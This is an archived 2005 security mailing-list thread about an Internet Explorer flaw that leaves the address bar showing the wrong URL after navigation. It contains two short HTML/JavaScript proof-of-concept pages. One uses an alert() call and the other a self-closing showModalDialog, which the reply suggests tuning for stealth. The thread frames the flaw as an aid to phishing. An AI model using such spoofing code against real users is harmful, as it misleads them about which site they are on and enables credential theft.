[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <004c01c5010d$cc5dd030$0100a8c0@grotedoos>
Date: Sun, 23 Jan 2005 06:38:38 +0100
From: "Berend-Jan Wever" <skylined@...p.tudelft.nl>
To: "Stewart, Graeme" <gstewart@...strepublic.com>,
<bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
Subject: Re: Internet Explorer URL obfuscation.
Migitating factors:
- You can only show a page you do not control as coming from a location you control, might as well use frames for that.
- Links on the targetted site still work as normal.
- Doesn't seem to allow cross-site scripting, which would make it a vulnerability.
- An alert window might attract more attention then you'd want: IE seems to forget to update the address-bar as soon as any other window is opened at the same time, be it a javascript error message, an alert(), a confirm() or a showModalDialog()... The cool thing about ModalDialogs is that you can close them automatically:
<html>
<script language="Javascript">
function page_load(){
document.location.href='http://www.google.com';
window.showModalDialog('javascript:setTimeout("window.close()", 10);');
}
</script>
<body>
<form>
<input type="submit" value="Update" name="patch_update" onClick="page_load()">
</form>
</body>
</html>
Above code should do the same as Graeme Stewart's origional code but the window needed to obfuscate the URL is closed as soon as the targetted site is opened... use showModalDialog()-parameters to make this even more stealhy.
Anyway, doesn't look like a big problem so far, but it might prove to have more potential: I did manage to crash IE with a NULL pointer once or twice while testing, unfortunately I wasn't able to reproduce that :(
Cheers,
Berend-Jan Wever <skylined@...p.tudelft.nl>
TTP: http://www.edup.tudelft.nl/~bjwever
MSN: skylined@...p.tudelft.nl
IRC: SkyLined in #SkyLined on EFNET
PGP: key ID 0x48479882
----- Original Message -----
From: "Stewart, Graeme" <gstewart@...strepublic.com>
To: <bugtraq@...urityfocus.com>
Sent: Saturday, January 22, 2005 02:08
Subject: Internet Explorer URL obfuscation.
> All,
>
> The following (very simple!) code calls a URL in the browser window but
> fails to update the address bar in IE. Looks like the form submission is
> suspended with the interrupt of the 'window.alert' call. IE then fails
> to correctly handle.
>
> Might be helpful in facilitating phishing style attacks. Assuming you
> can spoof the original location.
>
> I'm running windows XP SP2 with all the latest patches. It works
> correctly in FireFox (i.e. the address bar does update).
>
> Not sure if this really is a vulnerability, but would appreciate any
> thoughts.
>
> Thanks,
>
> Graeme Stewart
>
> --snip---
>
> <html>
> <script language="Javascript">
> function page_load(){
> document.location.href='http://www.google.com/';
> window.alert('Incorrect URL');
> }
> </script>
> <body>
> <form>
> <input type="submit" value="Update" name="patch_update"
> onClick="page_load()">
> </form>
> </body>
> </html>
>
> --snip---
>
> P.S My apologies if this is a known vuln. I did do some searching (i.e.
> Google!, but nothing similar came up).
>
>
> -----------------------------------------------------------------------
> The information transmitted is intended only for the person or entity
> to which it is addressed and may contain confidential and/or privileged
> material. Any review, retransmission, dissemination or other use of, or
> taking of any action in reliance upon, this information by persons or
> entities other than the intended recipient is prohibited. If you
> received this in error, please contact the sender and delete the
> material from any computer.
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists